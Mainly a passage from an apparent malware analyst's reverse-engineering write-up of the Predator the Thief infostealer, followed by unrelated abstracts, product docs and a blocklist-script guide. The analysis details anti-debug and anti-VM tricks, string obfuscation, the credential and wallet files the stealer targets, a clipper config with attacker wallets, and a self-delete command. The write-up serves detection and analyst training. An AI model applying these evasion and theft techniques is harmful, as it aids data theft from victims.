blocks with only two instructions (XOR & MOV), where stacks strings are decrypted X bytes per X bytes by just moving content on a temporary value (stored on EAX), XORed then pushed back to EBP, and the principle is reproduced endlessly again and again. This is rudimentary, In this scenario, it’s just part of the obfuscation process heavily abused by predator, for having an absurd amount of instruction for simple things. Also for some cases, When a hexadecimal/integer value is required for an API call, it could be possible to spot another pattern of a hardcoded string moved to a register then only one XOR instruction is performed for revealing the correct value, this trivial thing is used for some specific cases like the correct position in the TEB for retrieving the PEB, an RVA of a specific module, … Finally, the most common one, there is also the classic one used by using a for loop for a one key length XOR key, seen for decrypting modules, functions, and other things… str = ... # encrypted string for i, s in enumerate(str): s[i] = s[i] ^ s[len(str)-1] Let’s consider this as a perfect example of “let’s do the same exact thing by just changing one single instruction”, so in the end, a new encryption method is used with no effort for the development. That’s how a SUB instruction is used for doing the substitution cipher. The only difference that I could notice it’s how the key is retrieved. Besides having something hardcoded directly, a signed 32-bit division is performed, easily noticeable by the use of cdq & idiv instructions, then the dl register (the remainder) is used for the substitution. What’s the result in the end? Merging these obfuscation techniques leads to a nonsense amount of instructions for a basic task, which will obviously burn you some hours of analysis if you don’t take some time for cleaning a bit all that mess with the help of some scripts or plenty other ideas, that could trigger in your mind. It could be nice to see these days some scripts released by the community. There are plenty of techniques abused here that was not in the first analysis, this is not anymore a simple PEB.BeingDebugged or checking if you are running a virtual machine, so let’s dig into them. one per one except CheckRemoteDebugger! This one is enough to understand by itself :’) One of the oldest tricks in windows and still doing its work over the years. Basically in a very simple way (because there is a lot thing happening during the process), NtSetInformationThread is called with a value (0x11) obfuscated by a XOR operator. This parameter is a ThreadInformationClass with a specific enum called ThreadHideFromDebugger and when it’s executed, the debugger is not able to catch any debug information. So the supposed pointer to the corresponding thread is, of course, the malware and when you are analyzing it with a debugger, it will result to detach itself. Inside WinMain, a huge function is called with a lot of consecutive anti-debug tricks, they were almost all indirectly related to some techniques patched by TitanHide (or strongly looks like), the first one performed is a really basic one, but pretty efficient to do the task. Basically, when CloseHandle is called with an inexistent handle or an invalid one, it will raise an exception and whenever you have a debugger attached to the process, it will not like that at all. To guarantee that it’s not an issue for a normal interaction a simple __try / __except method is used, so if this API call is requested, it will safely lead to the end without any issue. The invalid handle used here is a static one and it’s L33T code with the value 0xBAADAA55 and makes me bored as much as this face. That’s not a surprise to see stuff like this from the malware developer. Inside jokes, l33t values, animes and probably other content that I missed are something usual to spot on Predator. When you are debugging a process, Microsoft Windows is creating a “Debug” object and a handle corresponding to it. At this point, when you want to check if this object exists on the process, NtQueryInformationProcess is used with the ProcessInfoClass initialized by 0x1e (that is in fact, ProcessDebugObjectHandle). In this case, the NTStatus value (returning result by the API call) is an error who as the ID 0xC0000353, aka STATUS_PORT_NOT_SET. This means, “An attempt to remove a process’s DebugPort was made, but a port was not already associated with the process.”. The anti-debug trick is to verify if this error is there, that’s all. This one is maybe considered as pretty wild if you are not familiar with some hardware breakpoints. Basically, there are some registers that are called “Debug Register” and they are using the DRX nomenclature (DR0 to DR7). When GetThreadContext is called, the function will retrieve al the context information from a thread. For those that are not familiar with a context structure, it contains all the register data from the corresponding element. So, with this data in possession, it only needs to check if those DRX registers are initiated with a value not equal to 0. On the case here, it’s easily spottable to see that 4 registers are checked if (ctx->Dr0 != 0 || ctx->Dr1 != 0 || ctx->Dr2 != 0 || ctx->Dr3 != 0) Int 3 breakpoint int 3 (or Interrupt 3) is a popular opcode to force the debugger to stop at a specific offset. As said in the title, this is a breakpoint but if it’s executed without any debugging environment, the exception handler is able to deal with this behavior and will continue to run without any issue. Unless I missed something, here is the scenario. By the way, as another scenario used for this one (the int 3), the number of this specific opcode triggered could be also used as an incremented counter, if the counter is above a specific value, a simplistic condition is sufficient to check if it’s executed into a debugger in that way. With all the techniques explained above, in the end, they all lead to a final condition step if of course, the debugger hasn’t crashed. The checking task is pretty easy to understand and it remains to a simple operation: “setting up a value to EAX during the anti-debug function”, if everything is correct this register will be set to zero, if not we could see all the different values that could be possible. …And when the Anti-Debug function is done, the register EAX is checked by the test operator, so the ZF flag is determinant for entering into the most important loop that contains the main function of the stealer. The Anti VM is presented as an option in Predator and is performed just after the first C&C requests. Tricks used are pretty olds and basically using Anti-VM Instructions - CPUID (Hypervisor Trick) By curiosity, this option is not by default performed if the C&C is not reachable. Paranoid & Organized Predator When entering into the “big main function”, the stealer is doing “again” extra validations if you have a valid payload (and not a modded one), you are running it correctly and being sure again that you are not analyzing it. This kind of paranoid checking step is a result of the multiple cases of cracked builders developed and released in the wild (mostly or exclusively at a time coming from XakFor.Net). Pretty wild and fun to see when Anti-Piracy protocols are also seen in the malware scape. Then the malware is doing a classic organized setup to perform all the requested actions and could be represented in that way. Of course as usual and already a bit explained in the first paper, the C&C domain is retrieved in a table of function pointers before the execution of the WinMain function (where the payload is starting to do tasks). You can see easily all the functions that will be called based on the starting location (__xc_z) and the ending location (__xc_z). Then you can spot easily the XOR strings that hide the C&C domain like the usual old predator malware. Data Encryption & Encoding Besides using XOR almost absolutely everywhere, this info stealer is using a mix of RC4 encryption and base64 encoding whenever it is receiving data from the C&C. Without using specialized tools or paid versions of IDA (or whatever other software), it could be a bit challenging to recognize it (when you are a junior analyst), due to some modification of some part of the code. For the Base64 functions, it’s extremely easy to spot them, with the symbol values on the register before and after calls. The only thing to notice with them, it’s that they are using a typical signature… A whole bloc of XOR stack strings, I believed that this trick is designed to hide an eventual Base64 alphabet from some Yara rules. By the way, the rest of the code remains identical to standard base64 algorithms. For RC4, things could be a little bit messy if you are not familiar at all with encryption algorithm on a disassembler/debugger, for some cases it could be hell, for some case not. Here, it’s, in fact, this amount of code for performing the process. Blocs are representing the Generation of the array S, then performing the Key-Scheduling Algorithm (KSA) by using a specific secret key that is, in fact, the C&C domain! (if there is no domain, but an IP hardcoded, this IP is the secret key), then the last one is the Pseudo-random generation algorithm (PRGA). For more info, some resources about this algorithm below: Mutex & Hardware ID The Hardware ID (HWID) and mutex are related, and the generation is quite funky, I would say, even if most of the people will consider this as something not important to investigate, I love small details in malware, even if their role is maybe meaningless, but for me, every detail counts no matter what (even the stupidest one). Here the hardware ID generation is split into 3 main parts. I had a lot of fun to understand how this one was created. First, it will grab all the available logical drives on the compromised machine, and for each of them, the serial number is saved into a temporary variable. Then, whenever a new drive is found, the hexadecimal value is added to it. so basically if the two drives have the serial number “44C5-F04D” and “1130-DDFF”, so ESI will receive 0x44C5F04D then will add 0x1130DFF. When it’s done, this value is put into a while loop that will divide the value on ESI by 0xA and saved the remainder into another temporary variable, the loop condition breaks when ESI is below 1. Then the results of this operation are saved, duplicated and added to itself the last 4 bytes (i.e 1122334455 will be 112233445522334455). If this is not sufficient, the value is put into another loop for performing this operation. for i, s in enumerate(str): if i & 1: a += chr(s) + 0x40 else: a += chr(s) It results in the creation of an alphanumeric string that will be the archive filename used during the POST request to the C&C. But wait! there is more… This value is in part of the creation of the mutex name… with a simple base64 operation on it and some bit operand operation for cutting part of the base64 encoding string for having finally the mutex name! A classic thing in malware, this feature is used for avoiding infecting machines coming from the Commonwealth of Independent States (CIS) by using a simple API call GetUserDefaultLangID. The value returned is the language identifier of the region format setting for the user and checked by a lot of specific language identifier, of courses in every situation, all the values that are tested, are encrypted. |Language ID||SubLanguage Symbol||Country| Files, files where are you? When I reversed for the first time this stealer, files and malicious archive were stored on the disk then deleted. But right now, this is not the case anymore. Predator is managing all the stolen data into memory for avoiding as much as possible any extra traces during the execution. Predator is nowadays creating in memory a lot of allocated pages and temporary files that will be used for interactions with real files that exist on the disk. Most of the time it’s basically getting handles, size and doing some operation for opening, grabbing content and saving them to a place in memory. This explanation is summarized in a “very” simplify way because there are a lot of cases and scenarios to manage this. Another point to notice is that the archive (using ZIP compression), is also created in memory by selecting folder/files. It doesn’t mean that the whole architecture for the files is different, it’s the same format as before. After explaining this many times about how this stuff, the fundamental idea is boringly the same for every stealer: - Analyzing (optional) - Parsing (optional) What could be different behind that, is how they are obfuscating the files or values to check… and guess what… every malware has their specialties (whenever they are not decided to copy the same piece of code on Github or some whatever generic .NET stealer) and in the end, there is no black magic, just simple (or complex) enigma to solve. As a malware analyst, when you are starting into analyzing stealers, you want literally to understand everything, because everything is new, and with the time, you realized the routine performed to fetch the data and how stupid it is working well (as reminder, it might be not always that easy for some highly specific stuff). In the end, you just want to know the targeted software, and only dig into those you haven’t seen before, but every time the thing is the same: - Checking dumbly a path - Checking a register key to have the correct path of a software - Checking a shortcut path based on an icon Beside that Predator the Thief is stealing a lot of different things: - Grabbing content from Browsers (Cookies, History, Credentials) - Harvesting/Fetching Credit Cards - Stealing sensible information & files from Crypto-Wallets - Credentials from FTP Software - Data coming from Instant communication software - Data coming from Messenger software - 2FA Authenticator software - Fetching Gaming accounts - Credentials coming from VPN software - Grabbing specific files (also dynamically) - Harvesting all the information from the computer (Specs, Software) - Stealing Clipboard (if during the execution of it, there is some content) - Making a picture of yourself (if your webcam is connected) - Making screenshot of your desktop - It could also include a Clipper (as a modular feature). - And… due to the module manager, other tasks that I still don’t have mentioned there (that also I don’t know who they are). Let’s explain just some of them that I found worth to dig into. Since my last analysis, things changed for the browser part and it’s now divided into three major parts. - Internet Explorer is analyzed in a specific function developed due that the data is contained into a “Vault”, so it requires a specific Windows API to read it. - Microsoft Edge is also split into another part of the stealing process due that this one is using unique files and needs some tasks for the parsing. - Then, the other browsers are fetched by using a homemade static grabber Grabber n°1 (The generic one) It’s pretty fun to see that the stealing process is using at least one single function for catching a lot of things. This generic grabber is pretty “cleaned” based on what I saw before even if there is no magic at all, it’s sufficient to make enough damages by using a recursive loop at a specific place that will search all the required files & folders. By comparing older versions of predator, when it was attempting to steal content from browsers and some wallets, it was checking step by step specific repositories or registry keys then processing into some loops and tasks for fetching the credentials. Nowadays, this step has been removed (for the browser part) and being part of this raw grabber that will parse everything starting to %USERS% repository. As usual, all the variables that contain required files are obfuscated and encrypted by a simple XOR algorithm and in the end, this is the “static” list that the info stealer will be focused |Login Data||Chrome / Chromium based||Copy & Parse| |Cookies||Chrome / Chromium based||Copy & Parse| |Web Data||Browsers||Copy & Parse| |History||Browsers||Copy & Parse| |formhistory.sqlite||Mozilla Firefox & Others||Copy & Parse| |cookies.sqlite||Mozilla Firefox & Others||Copy & Parse| |wallet.dat||Bitcoin||Copy & Parse| |.sln||Visual Studio Projects||Copy filename into Project.txt| |main.db||Skype||Copy & Parse| |logins.json||Chrome||Copy & Parse| |signons.sqlite||Mozilla Firefox & Others||Copy & Parse| |places.sqlite||Mozilla Firefox & Others||Copy & Parse| |Last Version||Mozilla Firefox & Others||Copy & Parse| Grabber n°2 (The dynamic one) There is a second grabber in Predator The Thief, and this not only used when there is available config loaded in memory based on the first request done to the C&C. In fact, it’s also used as part of the process of searching & copying critical files coming from wallets software, communication software, and others… The “main function” of this dynamic grabber only required three arguments: - The path where you want to search files - the requested file or mask - A path where the found files will be put in the final archive sent to the C&C When the grabber is configured for a recursive search, it’s simply adding at the end of the path the value “..” and checking if the next file is a folder to enter again into the same function again and again. In the end, in the fundamentals, this is almost the same pattern as the first grabber with the only difference that in this case, there are no parsing/analyzing files in an in-depth way. It’s simply this follow-up - Find a matched file based on the requested search - creating an entry on the stolen archive folder - setting a handle/pointer from the grabbed file - Save the whole content to memory Of course, there is a lot of particular cases that are to take in consideration here, but the main idea is like this. What Predator is stealing in the end? If we removed the dynamic grabber, this is the current list (for 3.3.2) about what kind of software that is impacted by this stealer, for sure, it’s hard to know precisely on the browser all the one that is impacted due to the generic grabber, but in the end, the most important one is listed here. - Authy (Inspired by Vidar) - Battle.net (Inspired by Kpot) - Mozilla Firefox (also Gecko browsers using same files) - Chrome (also Chromium browsers using same files) - Internet Explorer - Unmentioned browsers using the same files detected by the grabber. Also beside stealing other actions are performed like: - Performing a webcam picture capture - Performing a desktop screenshot There is currently 4 kind of loader implemented into this info stealer For all the cases, I have explained below (on another part of this analysis) what are the options of each of the techniques performed. There is no magic, there is nothing to explain more about this feature these days. There are enough articles and tutorials that are talking about this. The only thing to notice is that Predator is designed to load the payload in different ways, just by a simple process creation or abusing some process injections (i recommend on this part, to read the work from endgame). Something really interesting about this stealer these days, it that it developed a feature for being able to add the additional tasks as part of a module/plugin package. Maybe the name of this thing is wrongly named (i will probably be fixed soon about this statement). But now it’s definitely sure that we can consider this malware as a modular one. When decrypting the config from check.get, you can understand fast that a module will be launched, by looking at the last entry… This will be the name of the module that will be requested to the C&C. (this is also the easiest way to spot a new module). The first request is giving you the config of the module (on my case it was like this), it’s saved but NOT decrypted (looks like it will be dealt by the module on this part). The other request is focused on downloading the payload, decrypting it and saving it to the disk in a random folder in %PROGRAMDATA% (also the filename is generated also randomly), when it’s done, it’s simply executed by ShellExecuteA. Also, another thing to notice, you know that it’s designed to launch multiple modules/plugins. Clipper (Optional module) The clipper is one example of the Module that could be loaded by the module manager. As far as I saw, I only see this one (maybe they are other things, maybe not, I don’t have the visibility for that). Disclaimer: Before people will maybe mistaken, the clipper is proper to Predator the Thief and this is NOT something coming from another actor (if it’s the case, the loader part would be used). This malware module is developed in C++, and like Predator itself, you recognized pretty well the obfuscation proper to it (Stack strings, XOR, SUB, Code spaghetti, GetProcAddress recreated…). Well, everything that you love for slowing down again your analysis. As detailed already a little above, the module is designed to grab the config from the main program, decrypting it and starting to do the process routine indefinitely: - Open Clipboard - Checking content based on the config loaded - If something matches put the malicious wallet The clipper config is rudimentary using “|” as a delimiter. Mask/Regex on the left, malicious wallet on the right. 1*:1Eh8gHDVCS8xuKQNhCtZKiE1dVuRQiQ58H| 3*:1Eh8gHDVCS8xuKQNhCtZKiE1dVuRQiQ58H| 0x*:0x7996ad65556859C0F795Fe590018b08699092B9C| q*:qztrpt42h78ks7h6jlgtqtvhp3q6utm7sqrsupgwv0| G*:GaJvoTcC4Bw3kitxHWU4nrdDK3izXCTmFQ| X*:XruZmSaEYPX2mH48nGkPSGTzFiPfKXDLWn| L*:LdPvBrWvimse3WuVNg6pjH15GgBUtSUaWy| t*:t1dLgBbvV6sXNCMUSS5JeLjF4XhhbJYSDAe| 4*:44tLjmXrQNrWJ5NBsEj2R77ZBEgDa3fEe9GLpSf2FRmhexPvfYDUAB7EXX1Hdb3aMQ9FLqdJ56yaAhiXoRsceGJCRS3Jxkn| D*:DUMKwVVAaMcbtdWipMkXoGfRistK1cC26C| A*:AaUgfMh5iVkGKLVpMUZW8tGuyjZQNViwDt| There is no communication with the C&C when the clipper is switching wallet, it’s an offline one. When the parameters are set to 1 in the Predator config got by check.get, the malware is performing a really simple task to erase itself from the machine when all the tasks are done. By looking at the bottom of the main big function where all the task is performed, you can see two main blocs that could be skipped. these two are huge stack strings that will generate two things. - the API request “ShellExecuteA” - The command “ping 127.0.0.1 & del %PATH%” When all is prepared the thing is simply executed behind the classic register call. By the way, doing a ping request is one of the dozen way to do a sleep call and waiting for a little before performing the deletion. This option is not performed by default when the malware is not able to get data from the C&C. There is a bunch of files that are proper to this stealer, which are generated during the whole infection process. Each of them has a specific meaning. - Signature of the stealer - Stealing statistics - Computer specs - Number of users in the machine - List of logical drives - Current usage resources - Clipboard content - Network info - Compile-time of the payload Also, this generated file is literally “hell” when you want to dig into it by the amount of obfuscated code. I can quote these following important telemetry files: - Windows Build Version - Generated User-Agent - List of software installed in the machine (checking for x32 and x64 architecture folders) - List of actions & telemetry performed by the stealer itself during the stealing process - List of SLN filename found during the grabber research (the static one) - List of cookies content fetched/parsed Sometimes features are fun to dig in when I heard about that predator is now generating dynamic user-agent, I was thinking about some things but in fact, it’s way simpler than I thought. The User-Agent is generated in 5 steps - Decrypting a static string that contains the first part of the User-Agent - Using GetTickCount and grabbing the last bytes of it for generating a fake builder version of Chrome - Decrypting another static string that contains the end of the User-Agent - Concat Everything Tihs User-Agent is shown into the software.txt logfile. There is currently 4 kind of request seen in Predator 3.3.2 (it’s always a POST request) |api/check.get||Get dynamic config, tasks and network info| |api/gate.get ?……||Send stolen data| |api/.get||Get modular dynamic config| |api/.post||Get modular dynamic payload (was like this with the clipper)| The first step – Get the config & extra Infos For the first request, the response from the server is always in a specific form : - String obviously base64 encoded - Encrypted using RC4 encryption by using the domain name as the key When decrypted, the config is pretty easy to guess and also a bit complex (due to the number of options & parameters that the threat actor is able to do). [0;1;0;1;1;0;1;1;0;512;]#[[%userprofile%\Desktop|%userprofile%\Downloads|%userprofile%\Documents;*.xls,*.xlsx,*.doc,*.txt;128;;0]]#[Trakai;Republic of Lithuania;54.6378;24.9343;22.214.171.124;Europe/Vilnius;21001]##[Clipper] It’s easily understandable that the config is split by the “#” and each data and could be summarized like this - The stealer config - The grabber config - The network config - The loader config - The dynamic modular config (i.e Clipper) I have represented each of them into an array with the meaning of each of the parameters (when it was possible). |Field 1||Webcam screenshot| |Field 2||Anti VM| |Field 5||Desktop screenshot| |Field 7||Self Destroy| |Field 9||Windows Cookie| |Field 10||Max size for files grabbed| |Field 11||Powershell script (in base64)| |Field 1||%PATH% using “|” as a delimiter| |Field 2||Files to grab| |Field 3||Max sized for each file grabbed| |Field 5||Recursive search (0 – off | 1 – on)| |Field 3||GPS Coordinate| |Field 4||Time Zone| |Field 5||Postal Code| - Loader URL - Loader Type - Targeted Countries (“,” as a delimiter) - Blacklisted Countries (“,” as a delimiter) - Arguments on startup - Injected process OR Where it’s saved and executed - Pushing loader if the specific domain(s) is(are) seen in the stolen data - Pushing loader if wallets are presents - Executing in admin mode - Random file generated - Repeating execution Loader type (argument 2) Architecture (argument 3) |1||x32 / x64| If it’s RunPE (argument 7) If it’s CreateProcess / ShellExecuteA / LoadLibrary (argument 7) The second step – Sending stolen data - Sending stolen data - Also victim telemetry |p10||OS Version (encrypted + encoded)*| This is an example of crafted request performed by Predator the thief Third step – Modular tasks (optional) Give the dynamic clipper config Give the predator clipper payload The C&C is nowadays way different than the beginning, it has been reworked with some fancy designed and being able to do some stuff: - Modulable C&C - Classic fancy index with statistics - Possibility to configure your panel itself - Dynamic grabber configuration - Telegram notifications - Tags for specific domains The predator panel changed a lot between the v2 and v3. This is currently a fancy theme one, and you can easily spot the whole statistics at first glance. the thing to notice is that the panel is fully in Russian (and I don’t know at that time if there is an English one). Menu on the left is divide like this (but I’m not really sure about the correct translation) - Логов (Logs) - По странам (Country stats) - Лоадера (Loader Stats) - Загрузить модуль (Download/Upload Module) - Настройки сайта (Site settings) - Телеграм бот (Telegram Bot) - Конфиг (Config) Конвертация (Converter => Netscape Json converter) Statistics / Landscape In term of configuring predator, the choices are pretty wild: - The actor is able to tweak its panel, by modifying some details, like the title and detail that made me laugh is you can choose a dark theme. - There is also another form, the payload config is configured by just ticking options. When done, this will update the request coming from check.get - As usual, there is also a telegram bot feature Creating Tags for domains seen Small details which were also mentioned in Vidar, but if the actor wants specific attention for bots that have data coming from specific domains, it will create a tag that will help him to filter easily which of them is probably worth to dig into. The loader configuration is by far really interesting in my point of view and even it has been explained totally for its functionalities, I considered it pretty complete and user-friendly for the Threat Actor that is using it. Hashes for this analysis p_pckd.exe – 21ebdc3a58f3d346247b2893d41c80126edabb060759af846273f9c9d0c92a9a p_upkd.exe – 6e27a2b223ef076d952aaa7c69725c831997898bebcd2d99654f4a1aa3358619 p_clipper.exe – 01ef26b464faf08081fceeeb2cdff7a66ffdbd31072fe47b4eb43c219da287e8 Other predator hashes Infostealer is not considered as harmful as recent highly mediatize ransomware attacks, but they are enough effective to perform severe damage and they should not be underrated, furthermore, with the use of cryptocurrencies that are more and more common, or something totally normal nowadays, the lack of security hygiene on this subject is awfully insane. that I am not surprised at all to see so much money stolen, so they will be still really active, it’s always interesting to keep an eye on this malware family (and also on clippers), whenever there is a new wallet software or trading cryptocurrency software on the list, you know easily what are the possible trends (if you have a lack of knowledge in that area). Nowadays, it’s easy to see fresh activities in the wild for this info stealer, it could be dropped by important malware campaigns where notorious malware like ISFB Gozi is also used. It’s unnecessary (on my side) to speculate about what will be next move with Predator, I have clearly no idea and not interested in that kind of stuff. The thing is the malware scene nowadays is evolving really fast, threat actor teams are moving/switching easily and it could take only hours for new updates and rework of malware by just modifying a piece of code with something already developed on some GitHub repository, or copying code from another malware. Also, the price of the malware has been adjusted, or the support communication is moved to something else. Due to this, I am pretty sure at that time, this current in-depth analysis could be already outdated by some modifications. it’s always a risk to take and on my side, I am only interested in the malware itself, the main ideas/facts of the major version are explained and it’s plenty sufficient. There is, of course, some topics that I haven’t talk like nowadays predator is now being to work as a classic executable file or a DLL, but it was developed some times ago and this subject is now a bit popular. Also, another point that I didn’t find any explanation, is that seeing some decrypting process for strings that leads to some encryption algorithm related to Tor. This in-depth analysis is also focused on showing that even simple tricks are an efficient way to slow down analysis and it is a good exercise to practice your skills if you want to improve yourself into malware analysis. Also, reverse engineering is not as hard as people could think when the fundamental concepts are assimilated, It’s just time, practice and motivation. On my side, I am, as usual, typically irregular into releasing stuff due to some stuff (again…). By the way, updating projects are still one of my main focus, I still have some things that I would love to finish which are not necessarily into malware analysis, it’s cool to change topics sometimes.
Chapter 9. Application Visibility Control (AVC) This chapter covers the following topics: Application visibility control (AVC) use cases How AVC works The AVC building blocks Performance considerations when using AVC In the early years of IP networking, it was a fairly straightforward task to identify, classify, and control traffic based on the TCP ...
International Journal of Engineering Technology, Management and Applied Sciences (IJETMAS) Mobile Ad hoc NETwork (MANET) is distributed and self-configuring wireless network. MANET does not have a predefined network infrastructure. As MANET has dynamic infrastructure it is highly vulnerable to attacks particularly routing attacks. There are several intrusion response mechanisms available for justifying the routing attacks but most of them isolate malicious node. Risk justifying technique is one of the significant factors in MANET environment. Because of the non-stop alteration in topology and an open vulnerable media network, achieving security in ad hoc network is very difficult.
The DUP System is a language for productive, parallel, and distributed stream processing on POSIX systems. Programming with DUP is similar to writing shell scripts with pipes except that filters can have multiple inputs and outputs. Furthermore, the computation can be spread across multiple computers. A distinguishing characteristic of DUP compared to other streaming languages is that filters can be written in almost any programming language. The DUP System distribution includes the runtime system and a collection of over a dozen multi-stream filters. The Merlin project was initially started to create an easy way to set up distributed Nagios installations, allowing Nagios processes to exchange information directly as an alternative to the standard method using NSCA. It has also been extended with fault tolerance, the ability to store status information in a database, and other features. This allows Merlin to function as a backend for applications such as the Ninja project. Consh is a set of programs that can turn one or more UNIX hosts on a trusted LAN into a singular Bourne shell multi-computer on which shell scripts are run concurrently. The service abstracts hosts into what appears to be shell process with a fixed number of threads or workers, to which work may be assigned and results received concurrently. It includes utilities that assign commands to workers in parallel and a command that initiates distributed barriers between workers for synchronization purposes. Environment variables can be set on a per-host basis to implement locking mechanisms like semaphores or ticket algorithms. Daemons can delegate work to one another as needed. Tranche is file storage and dissemination software. Designed and built with scientists and researchers in mind, Tranche can handle very large data sets, is secure and scalable, and all data sets are citable in scientific journals. Features include a fully decentralized architecture, support for very large files, very long-term file persistence/preservation, file immutability/integrity, provenance, encryption, licensing, versioning, and citability. TinyIDS is a distributed intrusion detection system (IDS) for Unix systems. It is based on the client/server architecture and has been developed with security in mind. The client, tinyids, collects information from the local system by running its collector backends. The collected information may include anything, from file contents to file metadata or even the output of system commands. The client passes all this data through a hashing algorithm and a unique checksum (hash) is calculated. This hash is then sent to one or more TinyIDS servers (tinyidsd), where it is compared with a hash that had previously been stored in the databases of those remote servers for this specific client. A response indicating the result of the hash comparison is finally sent back to the client. Management of the remotely stored hash is possible through the client's command line interface. Communication between the client and the server can be encrypted using RSA public key infrastructure (PKI). Active Insight is an ESP/CEP (Event Stream Processing/Complex Event Processing) framework for real-time, value-based detection and reaction to events and patterns. It offers a distributed (cloud ready) event processing runtime with an embedded pattern engine to support event aggregation and correlation. Active Insight simplifies the development of distributed event processing using the plain old Java object (POJO) approach where events and event processors are plain Java objects wired by Spring dependency injection. The framework can be used for various applications such as homeland security, online behavioral targeting, advertising, fraud detection, SIEM, telematics, algorithmic trading, and others. Java distributed framework is a framework for distributed grid and / or volunteer computing. It's divided into a server and client library. You can create new or implement it into existing applications in no time; you don't need knowledge about network connections, sockets, etc. The Framework does almost everything automatically. It provides secure automatic client <-> server communications, unique IDs, automatic resending of jobs to new clients if needed, user stats, and much more. The client framework supports the detection of the computer's user state (idling, away, online, etc.). It also offers many other useful features and helpers for developing a distributed client application. Libchop is a set of utilities and library for data backup and distributed storage. Its main application is chop-backup, an encrypted backup program that supports data integrity checks, versioning at little cost, distribution among several sites, selective sharing of stored data, adaptive compression, and more. The library itself, which chop-backup builds upon, implements storage techniques such as content-based addressing, content hash keys, Merkle trees, similarity detection, and lossless compression. It makes it easy to combine them in different ways. The ‘chop-archiver’ and ‘chop-block-server’ tools, illustrated in the manual, provide direct access to these facilities from the command line. It is written in C and has Guile (Scheme) bindings.
A PROACTIVE APPROACH TO NETWORK FORENSICS INTRUSION (DENIAL OF SERVICE FLOOD ATTACK) USING DYNAMIC FEATURES, SELECTION AND CONVOLUTION NEURAL NETWORK Keywords:Cybercrime, Deep-Learning, Digital Forensic, Denial of Service Attacks, Network-monitoring system, Network Forensics Currently, the use of internet-connected applications for storage by different organizations have rapidly increased with the vast need to store data, cybercrimes are also increasing and have affected large organizations and countries as a whole with highly sensitive information, countries like the United States of America, United Kingdom and Nigeria. Organizations generate a lot of information with the help of digitalization, these highly classified information are now stored in databases via the use of computer networks. Thus, allowing for attacks by cybercriminals and state-sponsored agents. Therefore, these organizations and countries spend more resources analyzing cybercrimes instead of preventing and detecting cybercrimes. The use of network forensics plays an important role in investigating cybercrimes; this is because most cybercrimes are committed via computer networks. This paper proposes a new approach to analyzing digital evidence in Nigeria using a proactive method of forensics with the help of deep learning algorithms - Convolutional Neural Networks (CNN) to proactively classify malicious packets from genuine packets and log them as they occur. How to Cite Copyright (c) 2021 George & Uppin This work is licensed under a Creative Commons Attribution 4.0 International License.
Getting information about applications that are installed on protected virtual machines January 10, 2024 To create an Application Startup Control rule, it is recommended to first obtain information about the applications that are used on the protected virtual machines within the corporate LAN. You can obtain the following information: - Vendors, versions, and localizations of applications that are used on the corporate LAN. - Frequency of application updates. - Application usage policies adopted within the company (this may be security policies or administrative policies). - The location of storage with application installation packages. Information about applications that are used on the protected virtual machines on the corporate LAN is available in the Applications registry list and in the Executable files list. These lists can be viewed in the following ways: - In the Administration Console: Additional → Application management. - In the Web Console: Operations → Third-party applications. The Applications registry list contains applications that were detected by the Network Agent which is installed on protected virtual machines. The Executable files list contains executable files that have ever been started on protected virtual machines or were detected during Kaspersky Security inventory task. To view general information about the application and its executable files, as well as the list of protected virtual machines on which an application is installed, open the properties window of an application that is selected in one if these lists. Lists of applications and executable files are created by Network Agent if the About started applications check box is selected in the Light Agent for Windows policy properties in the Reports and Storages section in the Inform Administration Server subsection.
Implementation of Enhanced Security on Vehicular Cloud Computing In a Vehicular Cloud (VC), underutilized vehicular resources including computing power, data storage, and internet connectivity can be shared between rented out over the Internet to various customers. If the VC concept is to see a wide adoption and to have significant societal impact, security and privacy issues need to be addressed. The main contribution is to detect and examine a number of security challenges and potential privacy threats in VCs. Even though security issues has received the attention in cloud computing and vehicular networks, the authors identified security challenges that are special to VCs, e.g., challenges of authentication of high-mobility vehicles, scalability and the complexity of establishing trust relationships among multiple players caused by intermittent short-range communications.
ETSI releases World-First Report to Mitigate AI-Generated Deepfakes September 2023 by ETSI ETSI is thrilled to announce its new Group Report on Artificial Intelligence on the use of AI for what are commonly referred to as deepfakes. The Report ETSI GR SAI 011, released by the Securing AI (ISG SAI) group, focuses on the use of AI for manipulating multimedia identity representations and illustrates the consequential risks, as well as the measures that can be taken to mitigate them. “AI techniques allow for automated manipulations which previously required a substantial amount of manual work, and, in extreme cases, can even create fake multimedia data from scratch. Deepfake can also manipulate audio and video files in a targeted manner, while preserving high acoustic and visual quality in the results, which was largely infeasible using previous off-the-shelf technology. AI techniques can be used to manipulate audio and video files in a broader sense, e.g., by applying changes to the visual or acoustic background. Our ETSI Report proposes measures to mitigate them”, explains Scott Cadzow, Chair of ETSI ISG SAI. ETSI GR SAI 011 outlines many of the more immediate concerns raised by the rise of AI, particularly the use of AI-based techniques for automatically manipulating identity data represented in various media formats, such as audio, video, and text (deepfakes and, for example, AI-generated text software such as ChatGPT although, as always per ETSI guidelines, the Report does not address specific products or services). The Report describes the different technical approaches, and it also analyzes the threats posed by deepfakes in various attack scenarios. By analyzing the approaches used the ETSI Report aims to provide the basis for further technical and organizational measures to mitigate these threats, on top of discussing their effectiveness and limitations. ETSI’s ISG SAI is the only standardization group that focuses on Securing AI. It has already released eight Group Reports. The group works to rationalize the role of AI within the threat landscape, and in doing so, to identify measures that will lead to the safe and secure deployment of AI alongside the population that the AI is intended to serve.
We have written some scripts that you can use to get your ThreatSTOP block lists. Download the scripts here. The script queries the ThreatSTOP DNS server and stores the results in a file that PF can use to build a table. The resulting file is a list of IP addresses in CIDR format. You can then create a rule that will block access to and from the table. If this is a new device, please allow up to 15 minutes for our systems to be updated. The only prerequisite for OpenBSD systems is one Perl module and its dependencies. These are available as binary packages for OpenBSD. To install the modules run the following as root: pkg install p5-libwww This will install the LWP Perl module and any dependencies it defines. - threatstop-pf.sh: The main script. It downloads the block lists and creates the files PF uses to populate a table. - loguploadclient.pl: Perl script that uploads the log file - sendlog.sh: Converts the PF log file to plain text and calls loguploadclient.pl to upload the script. - install.sh: Installation script. - test.sh: Script to run a quick test to make sure the block lists are ready to be downloaded. - apl.sed: Supporting sed script to parse DNS APL query results. - prt.sed: Supporting sed script to parse DNS PTR query results. - threatstop.conf.example: Example configuration file. The IP address provided in the configuration sample (220.127.116.11) while accurate, is not currently supported by BSD Packet Filtering. We apologize for the inconvenience. In the interim please provide the IP address 18.104.22.168, this is our legacy DNS server but will work with the current script. After downloading and extracting the script, copy the configuration from the ThreatSTOP website into a file named “threatstop.conf” in the same directory where you extracted the downloaded file. There are some settings in the configuration that you will need to verify: - OUT_DIR: Directory where the files will be saved that PF 